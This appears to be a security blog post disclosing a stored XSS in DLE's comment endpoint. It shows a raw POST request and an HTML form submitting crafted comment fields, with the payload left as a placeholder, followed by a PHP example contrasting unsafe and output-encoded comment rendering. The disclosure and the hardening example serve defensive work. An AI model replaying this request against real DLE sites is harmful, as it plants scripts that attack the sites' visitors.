
DLE Stored XSS Injection



Written by alicangonullu on 2019-12-20 21:04:41. Estimated reading time: 1 minute, 7 seconds. Viewed 596 times.




Disclaimer


The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.


DLE Stored XSS Injection
# Exploit Author : Ali Can Gönüllü
# Exploit Date : 16-12-2019
# Source : https://github.com/Resert/dle
# Exploit :
POST https://xss.org/engine/ajax/addcomments.php
Host: xss.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1469
Origin: https://www.xss.org
Connection: keep-alive
Cookie: PHPSESSID=mhumqqrv70ju2hmpfr0qdflkb1

post_id=id&comments=xss_code&name=name&mail=mail@mail.com&editor_mode=&skin=Red&sec_code=editting_plz&question_answer=&g_recaptcha_response=&allow_subscribe=0
<form action="https://xss.org/engine/ajax/addcomments.php" method="post">
<input type="text" name="post_id" value="id"><br>
<input type="text" name="comments" value="comment"><br>
<input type="hidden" name="editor_mode" value=""><br>
<input type="hidden" name="skin" value="Red"><br>
<input type="text" name="sec_code" value="edit"><br>
<input type="text" name="question_answer" value="edit"><br>
<input type="submit" value="Submit">
</form>
The stored code is displayed at, for example: quote.php?id=id
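
On the rendering side, a stored XSS of this kind is closed by encoding the stored fields when the comment page is built. The following PHP is an added example, not code from the original post or from DLE; the function names `e`, `render_comment_unsafe` and `render_comment_safe`, the `data-author` attribute and the sample rows are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical renderer (an assumption, not DLE source code) for the
// user-controlled fields in the request above: name and comments.

/** Encode untrusted text for an HTML text node or a quoted attribute. */
function e(string $value): string
{
    // ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable form: stored values are concatenated into markup unchanged. */
function render_comment_unsafe(array $c): string
{
    return '<div class="comment" data-author="' . $c['name'] . '">'
        . '<b>' . $c['name'] . '</b><p>' . $c['comments'] . '</p></div>';
}

/** Hardened form: every stored field is encoded at output time. */
function render_comment_safe(array $c): string
{
    $name = e($c['name']);
    // Encode first, then turn newlines into <br> so only our own tag survives.
    $body = nl2br(e($c['comments']), false);
    return '<div class="comment" data-author="' . $name . '">'
        . '<b>' . $name . '</b><p>' . $body . '</p></div>';
}

// Constructed sample rows, as they might come back from the comments table.
$rows = [
    ['name' => 'name', 'comments' => "first line\nsecond line"],
    ['name' => 'Ali "AC"', 'comments' => '<script>alert(1)</script>'],
];

foreach ($rows as $row) {
    echo 'unsafe: ', render_comment_unsafe($row), PHP_EOL;
    echo 'safe:   ', render_comment_safe($row), PHP_EOL;
}
```

Run with `php` on the command line and compare the two output lines per row: in the hardened form the stored markup and the quote in the name arrive as entities, so the browser treats them as text.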